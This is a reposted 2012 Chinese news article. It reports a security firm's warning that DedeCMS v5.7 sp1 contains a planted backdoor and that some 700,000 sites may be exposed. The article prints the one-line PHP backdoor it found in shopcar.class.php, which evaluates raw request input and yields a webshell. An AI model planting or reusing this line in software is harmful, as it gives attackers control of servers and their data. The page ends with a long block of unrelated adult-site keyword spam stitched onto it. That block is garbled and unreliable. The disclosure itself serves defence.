瑞星:織夢CMS系統現后門70萬網站資料恐不保

作者: 來源:未知 2012-03-22 11:23:36 閱讀 我要評論 直達商品

騰訊科技訊 3月22日消息,瑞星公司今日對外發布緊急警示:國內知名的PHP開源網站管理系統——織夢CMS(DedeCms)v5.7 sp1版本被發現植入后門,黑客可通過此后門直接獲得網站的控制權限,獲取存儲在服務器上的文件和數據庫。

據CMS官方數據顯示,目前約有70萬網站使用該系統搭建,涉及企業、政府機關、媒體機構、行業及個人網站等。瑞星公司特此緊急提醒使用該系統的網站管理員,使用瑞星網站密碼安全檢測系統查找后門并及時進行封堵。

據瑞星專家介紹,織夢CMS(Dedecms) v5.7 sp1版本的中的shopcar.class.php文件被植入一句后門代碼“@eval(file_get_contents('php://input'));”。通過利用這個后門,黑客只需要構造簡單的數據包提交到服務器,就能夠獲取到該網站的WebShell,通過對服務器進一步滲透攻擊,進而獲取服務器的最高權限。

在黑客攻陷網站后,便可以直接訪問服務器上的文件、數據庫等信息。目前我國有大量網站采用該系統,此后門或將導致大量用戶的信息泄露,造成極為嚴重的影響。


  推薦閱讀

  全新酷狗電臺 邂逅音樂精彩

隨著Pandora網絡電臺在國外掀起一陣新的聽電臺熱潮,國內領先的數字音樂廠商酷狗音樂亦推出了其電臺產品, 基于酷狗龐大的音樂曲庫,結合人工多維度地細致分類,通過收集用戶行為進行算法優化等推薦方法向用戶提供優>>>詳細閱讀


本文標題:瑞星:織夢CMS系統現后門70萬網站資料恐不保

地址:http://www.sdlzkt.com/a/kandian/20120322/43160.html

樂購科技部分新聞及文章轉載自互聯網,供讀者交流和學習,若有涉及作者版權等問題請及時與我們聯系,以便更正、刪除或按規定辦理。感謝所有提供資訊的網站,歡迎各類媒體與樂購科技進行文章共享合作。

網友點評
我的評論: 人參與評論
驗證碼: 匿名回答
網友評論(點擊查看更多條評論)
友情提示: 登錄后發表評論,可以直接從評論中的用戶名進入您的個人空間,讓更多網友認識您。
自媒體專欄

評論

熱度

主站蜘蛛池模板: 日本成人免费在线视频| 亚洲精品亚洲人成人网| 成人亚洲成人影院| 成人性视频在线| 成人一区专区在线观看| 国产成人福利免费视频| 亚洲国产成人精品青青草原| a级成人高清毛片| 成人免费观看网欧美片| 国产精品成人va在线观看| 亚洲AV成人无码网站| 天天成人综合网| 欧美成人免费香蕉| 国产成人AV三级在线观看按摩| 亚洲精品成人片在线观看精品字幕 | 免费成人黄色大片| 婷婷国产成人精品视频| 羞羞漫画成人在线| 国产成人va亚洲电影| 日本成人福利视频| 欧美成人高清WW| 午夜在线观看视频免费成人| 成人免费福利电影| 欧美成人精品第一区二区三区| 国产成人一区二区三区免费视频| 成人一级片在线观看| 日韩黄a级成人毛片| 久久99国产精品成人欧美| 国产成人亚综合91精品首页| 国产成人黄色在线观看| 成人免费黄色网址| 成人毛片一区二区| 欧美成人家庭影院| 日韩成人在线免费视频| 日韩成人免费视频| 欧美一区二区三区成人片在线| www亚洲欲色成人久久精品| 久久久久亚洲AV成人无码| 色欲欲WWW成人网站| 成人在线免费视频| 国产成人精品实拍在线|